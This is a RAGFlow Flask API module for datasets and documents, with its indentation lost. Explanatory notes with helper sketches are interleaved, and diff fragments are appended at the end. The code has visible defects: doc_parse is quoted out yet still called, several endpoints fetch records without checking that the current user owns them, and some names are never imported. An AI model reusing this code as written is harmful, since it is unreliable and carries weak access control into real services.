from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.user_service import TenantService
from api.settings import RetCode
from api.utils import get_uuid
from api.utils.api_utils import construct_json_result, construct_error_response
from api.utils.api_utils import construct_result, validate_request
from api.utils.file_utils import filename_type, thumbnail
from rag.app import book, laws, manual, naive, one, paper, presentation, qa, resume, table, picture, audio
from rag.nlp import search
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils.minio_conn import MINIO
MAXIMUM_OF_UPLOADING_FILES = 256
# ------------------------------ create a dataset ---------------------------------------
@manager.route("/", methods=["POST"])
@login_required # use login
@validate_request("name") # check name key
def create_dataset():
# Check if Authorization header is present
authorization_token = request.headers.get("Authorization")
if not authorization_token:
return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Authorization header is missing.")
# TODO: Login or API key
# objs = APIToken.query(token=authorization_token)
#
# # Authorization error
# if not objs:
# return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Token is invalid.")
#
# tenant_id = objs[0].tenant_id
tenant_id = current_user.id
request_body = request.json
# In case that there's no name
if "name" not in request_body:
return construct_json_result(code=RetCode.DATA_ERROR, message="Expected 'name' field in request body")
dataset_name = request_body["name"]
# empty dataset_name
if not dataset_name:
return construct_json_result(code=RetCode.DATA_ERROR, message="Empty dataset name")
# In case that there's space in the head or the tail
dataset_name = dataset_name.strip()
# In case that the length of the name exceeds the limit
dataset_name_length = len(dataset_name)
if dataset_name_length > NAME_LENGTH_LIMIT:
return construct_json_result(
code=RetCode.DATA_ERROR,
message=f"Dataset name: {dataset_name} with length {dataset_name_length} exceeds {NAME_LENGTH_LIMIT}!")
# In case that there are other fields in the data-binary
if len(request_body.keys()) > 1:
name_list = []
for key_name in request_body.keys():
if key_name != "name":
name_list.append(key_name)
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"fields: {name_list}, are not allowed in request body.")
# If there is a duplicate name, it will modify it to make it unique
request_body["name"] = duplicate_name(
KnowledgebaseService.query,
name=dataset_name,
tenant_id=tenant_id,
status=StatusEnum.VALID.value)
try:
request_body["id"] = get_uuid()
request_body["tenant_id"] = tenant_id
request_body["created_by"] = tenant_id
exist, t = TenantService.get_by_id(tenant_id)
if not exist:
return construct_result(code=RetCode.AUTHENTICATION_ERROR, message="Tenant not found.")
request_body["embd_id"] = t.embd_id
if not KnowledgebaseService.save(**request_body):
# failed to create new dataset
return construct_result()
return construct_json_result(code=RetCode.SUCCESS,
data={"dataset_name": request_body["name"], "dataset_id": request_body["id"]})
except Exception as e:
return construct_error_response(e)
# -----------------------------list datasets-------------------------------------------------------
@manager.route("/", methods=["GET"])
@login_required
def list_datasets():
offset = request.args.get("offset", 0)
count = request.args.get("count", -1)
orderby = request.args.get("orderby", "create_time")
desc = request.args.get("desc", True)
try:
tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
datasets = KnowledgebaseService.get_by_tenant_ids_by_offset(
[m["tenant_id"] for m in tenants], current_user.id, int(offset), int(count), orderby, desc)
return construct_json_result(data=datasets, code=RetCode.SUCCESS, message=f"List datasets successfully!")
except HTTPError as http_err:
return construct_error_response(http_err)
except Exception as e:
return construct_error_response(e)
# ---------------------------------delete a dataset ----------------------------
@manager.route("/<dataset_id>", methods=["DELETE"])
@login_required
def remove_dataset(dataset_id):
try:
datasets = KnowledgebaseService.query(created_by=current_user.id, id=dataset_id)
# according to the id, searching for the dataset
if not datasets:
return construct_json_result(message=f"The dataset cannot be found for your current account.",
code=RetCode.OPERATING_ERROR)
# Iterating the documents inside the dataset
for doc in DocumentService.query(kb_id=dataset_id):
if not DocumentService.remove_document(doc, datasets[0].tenant_id):
# the process of deleting failed
return construct_json_result(code=RetCode.DATA_ERROR,
message="There was an error during the document removal process. "
"Please check the status of the RAGFlow server and try the removal again.")
# delete the other files
f2d = File2DocumentService.get_by_document_id(doc.id)
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
File2DocumentService.delete_by_document_id(doc.id)
# delete the dataset
if not KnowledgebaseService.delete_by_id(dataset_id):
return construct_json_result(code=RetCode.DATA_ERROR,
message="There was an error during the dataset removal process. "
"Please check the status of the RAGFlow server and try the removal again.")
# success
return construct_json_result(code=RetCode.SUCCESS, message=f"Remove dataset: {dataset_id} successfully")
except Exception as e:
return construct_error_response(e)
# ------------------------------ get details of a dataset ----------------------------------------
@manager.route("/<dataset_id>", methods=["GET"])
@login_required
def get_dataset(dataset_id):
try:
dataset = KnowledgebaseService.get_detail(dataset_id)
if not dataset:
return construct_json_result(code=RetCode.DATA_ERROR, message="Can't find this dataset!")
return construct_json_result(data=dataset, code=RetCode.SUCCESS)
except Exception as e:
return construct_error_response(e)
# ------------------------------ update a dataset --------------------------------------------
@manager.route("/<dataset_id>", methods=["PUT"])
@login_required
def update_dataset(dataset_id):
req = request.json
try:
# the request cannot be empty
if not req:
return construct_json_result(code=RetCode.DATA_ERROR, message="Please input at least one parameter that "
"you want to update!")
# check whether the dataset can be found
if not KnowledgebaseService.query(created_by=current_user.id, id=dataset_id):
return construct_json_result(message=f"Only the owner of knowledgebase is authorized for this operation!",
code=RetCode.OPERATING_ERROR)
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
# check whether there is this dataset
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR, message="This dataset cannot be found!")
if "name" in req:
name = req["name"].strip()
# check whether there is duplicate name
if name.lower() != dataset.name.lower() \
and len(KnowledgebaseService.query(name=name, tenant_id=current_user.id,
status=StatusEnum.VALID.value)) > 1:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"The name: {name.lower()} is already used by other "
f"datasets. Please choose a different name.")
dataset_updating_data = {}
chunk_num = req.get("chunk_num")
# modify the value of 11 parameters
# 2 parameters: embedding id and chunk method
# only if chunk_num is 0, the user can update the embedding id
if req.get("embedding_model_id"):
if chunk_num == 0:
dataset_updating_data["embd_id"] = req["embedding_model_id"]
else:
return construct_json_result(code=RetCode.DATA_ERROR,
message="You have already parsed the document in this "
"dataset, so you cannot change the embedding "
"model.")
# only if chunk_num is 0, the user can update the chunk_method
if "chunk_method" in req:
type_value = req["chunk_method"]
if is_illegal_value_for_enum(type_value, ParserType):
return construct_json_result(message=f"Illegal value {type_value} for 'chunk_method' field.",
code=RetCode.DATA_ERROR)
if chunk_num != 0:
return construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document "
"in this dataset, so you cannot "
"change the chunk method.")
dataset_updating_data["parser_id"] = type_value
# convert the photo parameter to avatar
if req.get("photo"):
dataset_updating_data["avatar"] = req["photo"]
# layout_recognize
if "layout_recognize" in req:
if "parser_config" not in dataset_updating_data:
dataset_updating_data['parser_config'] = {}
dataset_updating_data['parser_config']['layout_recognize'] = req['layout_recognize']
# TODO: updating use_raptor needs to construct a class
# 6 parameters
for key in ["name", "language", "description", "permission", "id", "token_num"]:
if key in req:
dataset_updating_data[key] = req.get(key)
# update
if not KnowledgebaseService.update_by_id(dataset.id, dataset_updating_data):
return construct_json_result(code=RetCode.OPERATING_ERROR, message="Failed to update! "
"Please check the status of RAGFlow "
"server and try again!")
exist, dataset = KnowledgebaseService.get_by_id(dataset.id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR, message="Failed to get the dataset "
"using the dataset ID.")
return construct_json_result(data=dataset.to_json(), code=RetCode.SUCCESS)
except Exception as e:
return construct_error_response(e)
# --------------------------------content management ----------------------------------------------
# ----------------------------upload files-----------------------------------------------------
@manager.route("/<dataset_id>/documents/", methods=["POST"])
@login_required
def upload_documents(dataset_id):
# no files
if not request.files:
return construct_json_result(
message="There is no file!", code=RetCode.ARGUMENT_ERROR)
# the number of uploading files exceeds the limit
file_objs = request.files.getlist("file")
num_file_objs = len(file_objs)
if num_file_objs > MAXIMUM_OF_UPLOADING_FILES:
return construct_json_result(code=RetCode.DATA_ERROR, message=f"You tried to upload {num_file_objs} files, "
f"which exceeds the maximum number of files per upload: {MAXIMUM_OF_UPLOADING_FILES}")
# no dataset
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(message="Can't find this dataset", code=RetCode.DATA_ERROR)
for file_obj in file_objs:
file_name = file_obj.filename
# no name
if not file_name:
return construct_json_result(
message="There is a file without name!", code=RetCode.ARGUMENT_ERROR)
# TODO: support the remote files
if 'http' in file_name:
return construct_json_result(code=RetCode.ARGUMENT_ERROR, message="Remote files are not supported yet.")
# get the root_folder
root_folder = FileService.get_root_folder(current_user.id)
# get the id of the root_folder
parent_file_id = root_folder["id"] # document id
# this is for the new user, create '.knowledgebase' file
FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
# go inside this folder, get the kb_root_folder
kb_root_folder = FileService.get_kb_folder(current_user.id)
# link the file management to the kb_folder
kb_folder = FileService.new_a_file_from_kb(dataset.tenant_id, dataset.name, kb_root_folder["id"])
# grab all the errs
err = []
MAX_FILE_NUM_PER_USER = int(os.environ.get("MAX_FILE_NUM_PER_USER", 0))
uploaded_docs_json = []
for file in file_objs:
try:
# TODO: get this value from the database as some tenants have this limit while others don't
if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(dataset.tenant_id) >= MAX_FILE_NUM_PER_USER:
return construct_json_result(code=RetCode.DATA_ERROR,
message="Exceed the maximum file number of a free user!")
# deal with the duplicate name
filename = duplicate_name(
DocumentService.query,
name=file.filename,
kb_id=dataset.id)
# deal with the unsupported type
filetype = filename_type(filename)
if filetype == FileType.OTHER.value:
return construct_json_result(code=RetCode.DATA_ERROR,
message="This type of file has not been supported yet!")
# upload to the minio
location = filename
while MINIO.obj_exist(dataset_id, location):
location += "_"
blob = file.read()
# the content is empty, raising a warning
if blob == b'':
warnings.warn(f"[WARNING]: The content of the file {filename} is empty.")
MINIO.put(dataset_id, location, blob)
doc = {
"id": get_uuid(),
"kb_id": dataset.id,
"parser_id": dataset.parser_id,
"parser_config": dataset.parser_config,
"created_by": current_user.id,
"type": filetype,
"name": filename,
"location": location,
"size": len(blob),
"thumbnail": thumbnail(filename, blob)
}
if doc["type"] == FileType.VISUAL:
doc["parser_id"] = ParserType.PICTURE.value
if doc["type"] == FileType.AURAL:
doc["parser_id"] = ParserType.AUDIO.value
if re.search(r"\.(ppt|pptx|pages)$", filename):
doc["parser_id"] = ParserType.PRESENTATION.value
DocumentService.insert(doc)
FileService.add_file_from_kb(doc, kb_folder["id"], dataset.tenant_id)
uploaded_docs_json.append(doc)
except Exception as e:
err.append(file.filename + ": " + str(e))
if err:
# return all the errors
return construct_json_result(message="\n".join(err), code=RetCode.SERVER_ERROR)
# success
return construct_json_result(data=uploaded_docs_json, code=RetCode.SUCCESS)
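The upload handler above avoids overwriting an existing object by appending `_` to the storage location until the name is free. A minimal sketch of that loop follows, with an in-memory set standing in for the object store. The helper name `unique_location` and the `exists` callable are assumptions made for illustration and are not part of the RAGFlow code base.

```python
def unique_location(name, exists):
    """Return `name`, suffixed with underscores until `exists` reports it as free.

    `exists` is a hypothetical callable standing in for MINIO.obj_exist(bucket, location).
    """
    location = name
    while exists(location):
        location += "_"
    return location


# In-memory stand-in for the bucket contents (illustrative data only).
stored = {"a.pdf", "a.pdf_"}
free_name = unique_location("a.pdf", stored.__contains__)
```

The displayed document name and the storage location can therefore differ, which is why the handler stores both `name` and `location` in the document record.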
# ----------------------------delete a file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["DELETE"])
@login_required
def delete_document(document_id, dataset_id): # string
# get the root folder
root_folder = FileService.get_root_folder(current_user.id)
# parent file's id
parent_file_id = root_folder["id"]
# consider the new user
FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
# collect any errors raised during removal
errors = ""
try:
# whether there is this document
exist, doc = DocumentService.get_by_id(document_id)
if not exist:
return construct_json_result(message=f"Document {document_id} not found!", code=RetCode.DATA_ERROR)
# whether this doc is authorized by this tenant
tenant_id = DocumentService.get_tenant_id(document_id)
if not tenant_id:
return construct_json_result(
message=f"You are not authorized to delete the document {document_id}!",
code=RetCode.AUTHENTICATION_ERROR)
# get the doc's id and location
real_dataset_id, location = File2DocumentService.get_minio_address(doc_id=document_id)
if real_dataset_id != dataset_id:
return construct_json_result(message=f"The document {document_id} is not in the dataset: {dataset_id}, "
f"but in the dataset: {real_dataset_id}.", code=RetCode.ARGUMENT_ERROR)
# there is an issue when removing
if not DocumentService.remove_document(doc, tenant_id):
return construct_json_result(
message="There was an error during the document removal process. Please check the status of the "
"RAGFlow server and try the removal again.", code=RetCode.OPERATING_ERROR)
# fetch the File2Document record associated with the provided document ID.
file_to_doc = File2DocumentService.get_by_document_id(document_id)
# delete the associated File record.
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == file_to_doc[0].file_id])
# delete the File2Document record itself using the document ID. This removes the
# association between the document and the file after the File record has been deleted.
File2DocumentService.delete_by_document_id(document_id)
# delete it from minio
MINIO.rm(dataset_id, location)
except Exception as e:
errors += str(e)
if errors:
return construct_json_result(data=False, message=errors, code=RetCode.SERVER_ERROR)
return construct_json_result(data=True, code=RetCode.SUCCESS)
# ----------------------------list files-----------------------------------------------------
@manager.route('/<dataset_id>/documents/', methods=['GET'])
@login_required
def list_documents(dataset_id):
if not dataset_id:
return construct_json_result(
data=False, message="Lack of 'dataset_id'", code=RetCode.ARGUMENT_ERROR)
# searching keywords
keywords = request.args.get("keywords", "")
offset = request.args.get("offset", 0)
count = request.args.get("count", -1)
order_by = request.args.get("order_by", "create_time")
descend = request.args.get("descend", True)
try:
docs, total = DocumentService.list_documents_in_dataset(dataset_id, int(offset), int(count), order_by,
descend, keywords)
return construct_json_result(data={"total": total, "docs": docs}, code=RetCode.SUCCESS)
except Exception as e:
return construct_error_response(e)
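One detail of `list_documents` worth illustrating: query-string values arrive as strings, so a request with `descend=false` yields the non-empty string `"false"`, which is truthy in Python. The sketch below shows one way to normalise such a flag. The helper name `parse_bool` and the set of accepted spellings are assumptions for illustration, not something the handler above defines.

```python
def parse_bool(raw, default=True):
    """Interpret a query-string flag; `raw` is None when the parameter is absent."""
    if raw is None:
        return default
    if isinstance(raw, bool):
        return raw
    # Accepted spellings are an assumption; adjust to the API's contract.
    return str(raw).strip().lower() in {"1", "true", "yes", "on"}


# A plain truthiness test treats the string "false" as True.
naive_result = bool("false")
parsed_result = parse_bool("false")
```

A handler could apply such a helper to the `descend` value before passing it on to the listing query.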
# ----------------------------update: enable rename-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["PUT"])
@login_required
def update_document(dataset_id, document_id):
req = request.json
try:
# The request body cannot be empty
if not req:
return construct_json_result(
code=RetCode.DATA_ERROR,
message="Please input at least one parameter that you want to update!")
# Reject any key outside the supported set
legal_parameters = {"name", "enable", "template_type"}
for key in req.keys():
if key not in legal_parameters:
return construct_json_result(code=RetCode.ARGUMENT_ERROR, message=f"{key} is an illegal parameter.")
# Check whether there is this dataset
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset {dataset_id} cannot be found!")
# The document does not exist
exist, document = DocumentService.get_by_id(document_id)
if not exist:
return construct_json_result(message=f"This document {document_id} cannot be found!",
code=RetCode.ARGUMENT_ERROR)
# Deal with the different keys
updating_data = {}
if "name" in req:
new_name = req["name"]
# Check whether the new_name is suitable
# 1. no name value
if not new_name:
return construct_json_result(code=RetCode.DATA_ERROR, message="There is no new name.")
# 2. Strip leading and trailing whitespace before storing the name
new_name = new_name.strip()
updating_data["name"] = new_name
# 3. Check whether the new_name has the same extension of file as before
if pathlib.Path(new_name.lower()).suffix != pathlib.Path(
document.name.lower()).suffix:
return construct_json_result(
data=False,
message="The extension of file cannot be changed",
code=RetCode.ARGUMENT_ERROR)
# 4. Check whether the new name has already been occupied by other file
for d in DocumentService.query(name=new_name, kb_id=document.kb_id):
if d.name == new_name:
return construct_json_result(
message="Duplicated document name in the same dataset.",
code=RetCode.ARGUMENT_ERROR)
if "enable" in req:
enable_value = req["enable"]
if is_illegal_value_for_enum(enable_value, StatusEnum):
return construct_json_result(message=f"Illegal value {enable_value} for 'enable' field.",
code=RetCode.DATA_ERROR)
updating_data["status"] = enable_value
# TODO: Chunk-method - update parameters inside the json object parser_config
if "template_type" in req:
type_value = req["template_type"]
if is_illegal_value_for_enum(type_value, ParserType):
return construct_json_result(message=f"Illegal value {type_value} for 'template_type' field.",
code=RetCode.DATA_ERROR)
updating_data["parser_id"] = req["template_type"]
# The process of updating
if not DocumentService.update_by_id(document_id, updating_data):
return construct_json_result(
code=RetCode.OPERATING_ERROR,
message="Failed to update document in the database! "
"Please check the status of RAGFlow server and try again!")
# name part: file service
if "name" in req:
# Get file by document id
file_information = File2DocumentService.get_by_document_id(document_id)
if file_information:
exist, file = FileService.get_by_id(file_information[0].file_id)
FileService.update_by_id(file.id, {"name": updating_data["name"]})
exist, document = DocumentService.get_by_id(document_id)
# Success
return construct_json_result(data=document.to_json(), message="Success", code=RetCode.SUCCESS)
except Exception as e:
return construct_error_response(e)
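The rename branch of `update_document` refuses a new name whose extension differs from the current one, comparing `pathlib.Path(...).suffix` case-insensitively. A small standalone sketch of that comparison follows. The helper name `same_extension` is an assumption introduced for illustration.

```python
import pathlib


def same_extension(old_name, new_name):
    """Compare the final suffix of two file names, ignoring case and outer whitespace."""
    old_suffix = pathlib.Path(old_name.lower()).suffix
    new_suffix = pathlib.Path(new_name.strip().lower()).suffix
    return old_suffix == new_suffix


rename_allowed = same_extension("Report.PDF", " summary.pdf ")
rename_rejected = same_extension("notes.pdf", "notes.docx")
```

Note that `suffix` only returns the last component, so `archive.tar.gz` is treated as having the extension `.gz`.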
# Helper method to judge whether it's an illegal value
def is_illegal_value_for_enum(value, enum_class):
return value not in enum_class.__members__.values()
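How `is_illegal_value_for_enum` behaves depends on how the enum is declared, because the membership test compares the raw request value against enum members with `==`. The sketch below contrasts a plain `Enum` with one that mixes in `str`. Both enum classes are hypothetical stand-ins; how `StatusEnum` and `ParserType` are actually declared is not shown in this diff.

```python
from enum import Enum


class PlainStatus(Enum):
    """Hypothetical plain enum: members never compare equal to raw strings."""
    VALID = "1"
    INVALID = "0"


class StrParser(str, Enum):
    """Hypothetical str-mixin enum: members compare equal to their string values."""
    NAIVE = "naive"
    BOOK = "book"


def is_illegal_value_for_enum(value, enum_class):
    # Same check as the helper above: compares `value` against the members.
    return value not in enum_class.__members__.values()


def is_illegal_by_value(value, enum_class):
    # Alternative that compares against the members' underlying values instead.
    return value not in {member.value for member in enum_class}


str_mixin_result = is_illegal_value_for_enum("naive", StrParser)
plain_result = is_illegal_value_for_enum("1", PlainStatus)
by_value_result = is_illegal_by_value("1", PlainStatus)
```

If an enum passed to the helper turns out to be a plain `Enum`, comparing against `member.value` as in `is_illegal_by_value` is one possible way to accept raw JSON values.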
# ----------------------------download a file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["GET"])
@login_required
def download_document(dataset_id, document_id):
try:
# Check whether there is this dataset
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset '{dataset_id}' cannot be found!")
# Check whether there is this document
exist, document = DocumentService.get_by_id(document_id)
if not exist:
return construct_json_result(message=f"This document '{document_id}' cannot be found!",
code=RetCode.ARGUMENT_ERROR)
# The process of downloading
doc_id, doc_location = File2DocumentService.get_minio_address(doc_id=document_id) # minio address
file_stream = MINIO.get(doc_id, doc_location)
if not file_stream:
return construct_json_result(message="This file is empty.", code=RetCode.DATA_ERROR)
file = BytesIO(file_stream)
# Use send_file with a proper filename and MIME type
return send_file(
file,
as_attachment=True,
download_name=document.name,
mimetype='application/octet-stream' # Set a default MIME type
)
# Error
except Exception as e:
return construct_error_response(e)
# ----------------------------start parsing a document-----------------------------------------------------
# helper method for parsing
# callback method
def doc_parse_callback(doc_id, prog=None, msg=""):
cancel = DocumentService.do_cancel(doc_id)
if cancel:
raise Exception("The parsing process has been cancelled!")
"""
def doc_parse(binary, doc_name, parser_name, tenant_id, doc_id):
match parser_name:
case "book":
book.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "laws":
laws.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "manual":
manual.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "naive":
# It's the mode by default, which is general in the front-end
naive.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "one":
one.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "paper":
paper.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "picture":
picture.chunk(doc_name, binary=binary, tenant_id=tenant_id, lang="Chinese",
callback=partial(doc_parse_callback, doc_id))
case "presentation":
presentation.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "qa":
qa.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "resume":
resume.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "table":
table.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "audio":
audio.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case _:
return False
return True
"""
@manager.route("/<dataset_id>/documents/<document_id>/status", methods=["POST"])
@login_required
def parse_document(dataset_id, document_id):
try:
# valid dataset
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset '{dataset_id}' cannot be found!")
return parsing_document_internal(document_id)
except Exception as e:
return construct_error_response(e)
# ----------------------------start parsing documents-----------------------------------------------------
@manager.route("/<dataset_id>/documents/status", methods=["POST"])
@login_required
def parse_documents(dataset_id):
doc_ids = request.json["doc_ids"]
try:
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset '{dataset_id}' cannot be found!")
# two conditions
if not doc_ids:
# documents inside the dataset
docs, total = DocumentService.list_documents_in_dataset(dataset_id, 0, -1, "create_time",
True, "")
doc_ids = [doc["id"] for doc in docs]
message = ""
# for loop
for id in doc_ids:
res = parsing_document_internal(id)
res_body = res.json
if res_body["code"] == RetCode.SUCCESS:
message += res_body["message"]
else:
return res
return construct_json_result(data=True, code=RetCode.SUCCESS, message=message)
except Exception as e:
return construct_error_response(e)
# helper method for parsing the document
def parsing_document_internal(id):
message = ""
try:
# Check whether there is this document
exist, document = DocumentService.get_by_id(id)
if not exist:
return construct_json_result(message=f"This document '{id}' cannot be found!",
code=RetCode.ARGUMENT_ERROR)
tenant_id = DocumentService.get_tenant_id(id)
if not tenant_id:
return construct_json_result(message="Tenant not found!", code=RetCode.AUTHENTICATION_ERROR)
info = {"run": "1", "progress": 0}
info["progress_msg"] = ""
info["chunk_num"] = 0
info["token_num"] = 0
DocumentService.update_by_id(id, info)
ELASTICSEARCH.deleteByQuery(Q("match", doc_id=id), idxnm=search.index_name(tenant_id))
_, doc_attributes = DocumentService.get_by_id(id)
doc_attributes = doc_attributes.to_dict()
doc_id = doc_attributes["id"]
bucket, doc_name = File2DocumentService.get_minio_address(doc_id=doc_id)
binary = MINIO.get(bucket, doc_name)
parser_name = doc_attributes["parser_id"]
if binary:
res = doc_parse(binary, doc_name, parser_name, tenant_id, doc_id)
if res is False:
message += f"The parser id: {parser_name} of the document {doc_id} is not supported; "
else:
message += f"Empty data in the document: {doc_name}; "
# failed in parsing
if doc_attributes["status"] == TaskStatus.FAIL.value:
message += f"Failed in parsing the document: {doc_id}; "
return construct_json_result(code=RetCode.SUCCESS, message=message)
except Exception as e:
return construct_error_response(e)
# ----------------------------stop parsing a doc-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>/status", methods=["DELETE"])
@login_required
def stop_parsing_document(dataset_id, document_id):
try:
# valid dataset
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset '{dataset_id}' cannot be found!")
return stop_parsing_document_internal(document_id)
except Exception as e:
return construct_error_response(e)
# ----------------------------stop parsing docs-----------------------------------------------------
@manager.route("/<dataset_id>/documents/status", methods=["DELETE"])
@login_required
def stop_parsing_documents(dataset_id):
doc_ids = request.json["doc_ids"]
try:
# valid dataset?
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset '{dataset_id}' cannot be found!")
if not doc_ids:
# documents inside the dataset
docs, total = DocumentService.list_documents_in_dataset(dataset_id, 0, -1, "create_time",
True, "")
doc_ids = [doc["id"] for doc in docs]
message = ""
# for loop
for id in doc_ids:
res = stop_parsing_document_internal(id)
res_body = res.json
if res_body["code"] == RetCode.SUCCESS:
message += res_body["message"]
else:
return res
return construct_json_result(data=True, code=RetCode.SUCCESS, message=message)
except Exception as e:
return construct_error_response(e)
# Helper method
def stop_parsing_document_internal(document_id):
try:
# valid doc?
exist, doc = DocumentService.get_by_id(document_id)
if not exist:
return construct_json_result(message=f"This document '{document_id}' cannot be found!",
code=RetCode.ARGUMENT_ERROR)
doc_attributes = doc.to_dict()
# only when the status is parsing, we need to stop it
if doc_attributes["status"] == TaskStatus.RUNNING.value:
tenant_id = DocumentService.get_tenant_id(document_id)
if not tenant_id:
return construct_json_result(message="Tenant not found!", code=RetCode.AUTHENTICATION_ERROR)
# update successfully?
if not DocumentService.update_by_id(document_id, {"status": "2"}): # cancel
return construct_json_result(
code=RetCode.OPERATING_ERROR,
message="An error occurred while stopping the parsing of the document. "
"Please check the status of the RAGFlow server and try again."
)
_, doc_attributes = DocumentService.get_by_id(document_id)
doc_attributes = doc_attributes.to_dict()
# failed in stop parsing
if doc_attributes["status"] == TaskStatus.RUNNING.value:
return construct_json_result(message=f"Failed to stop parsing the document: {document_id}; ", code=RetCode.SUCCESS)
return construct_json_result(code=RetCode.SUCCESS, message="")
except Exception as e:
return construct_error_response(e)
# ----------------------------show the status of the file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>/status", methods=["GET"])
@login_required
def show_parsing_status(dataset_id, document_id):
try:
# valid dataset
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset: '{dataset_id}' cannot be found!")
# valid document
exist, doc = DocumentService.get_by_id(document_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This document: '{document_id}' is not a valid document.")
doc_attributes = doc.to_dict()
return construct_json_result(
data={"progress": doc_attributes["progress"], "status": TaskStatus(doc_attributes["status"]).name},
code=RetCode.SUCCESS
)
except Exception as e:
return construct_error_response(e)
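`show_parsing_status` turns the stored status code into a readable name with `TaskStatus(value).name`, which raises `ValueError` when the stored value matches no member. The sketch below shows that lookup with a fallback. The enum `TaskState`, its members and the `"UNKNOWN"` fallback are assumptions for illustration and do not reproduce the real `TaskStatus` definition.

```python
from enum import Enum


class TaskState(Enum):
    """Hypothetical stand-in for TaskStatus; the member values are illustrative."""
    UNSTART = "0"
    RUNNING = "1"
    CANCEL = "2"
    DONE = "3"
    FAIL = "4"


def status_name(raw_value):
    """Map a stored status value to its member name, or "UNKNOWN" if unmapped."""
    try:
        return TaskState(raw_value).name
    except ValueError:
        return "UNKNOWN"


running_label = status_name("1")
unmapped_label = status_name("9")
```

In the handler above an unmapped value would instead be caught by the surrounding `except` block and returned as an error response.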
# ----------------------------list the chunks of the file-----------------------------------------------------
# ----------------------------delete the chunk-----------------------------------------------------
# ----------------------------edit the status of the chunk-----------------------------------------------------
# ----------------------------insert a new chunk-----------------------------------------------------
# ----------------------------upload a file-----------------------------------------------------
# ----------------------------get a specific chunk-----------------------------------------------------
# ----------------------------retrieval test-----------------------------------------------------

View File

@ -32,9 +32,14 @@ def set_dialog():
dialog_id = req.get("dialog_id")
name = req.get("name", "New Dialog")
description = req.get("description", "A helpful Dialog")
icon = req.get("icon", "")
top_n = req.get("top_n", 6)
top_k = req.get("top_k", 1024)
rerank_id = req.get("rerank_id", "")
if not rerank_id: req["rerank_id"] = ""
similarity_threshold = req.get("similarity_threshold", 0.1)
vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
if vector_similarity_weight is None: vector_similarity_weight = 0.3
llm_setting = req.get("llm_setting", {})
default_prompt = {
"system": """你是一个智能助手,请总结知识库的内容来回答问题,请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时,你的回答必须包括“知识库中未找到您要的答案!”这句话。回答需要考虑聊天历史。
@ -83,8 +88,11 @@ def set_dialog():
"llm_setting": llm_setting,
"prompt_config": prompt_config,
"top_n": top_n,
"top_k": top_k,
"rerank_id": rerank_id,
"similarity_threshold": similarity_threshold,
"vector_similarity_weight": vector_similarity_weight
"vector_similarity_weight": vector_similarity_weight,
"icon": icon
}
if not DialogService.save(**dia):
return get_data_error_result(retmsg="Fail to new a dialog!")
@ -136,7 +144,7 @@ def get_kb_names(kb_ids):
@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_dialogs():
try:
diags = DialogService.query(
tenant_id=current_user.id,

View File

@ -23,7 +23,7 @@ from elasticsearch_dsl import Q
from flask import request
from flask_login import login_required, current_user
from api.db.db_models import Task
from api.db.db_models import Task, File
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.task_service import TaskService, queue_tasks
@ -33,12 +33,14 @@ from api.db.services import duplicate_name
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.db import FileType, TaskStatus, ParserType
from api.db import FileType, TaskStatus, ParserType, FileSource
from api.db.services.document_service import DocumentService
from api.settings import RetCode
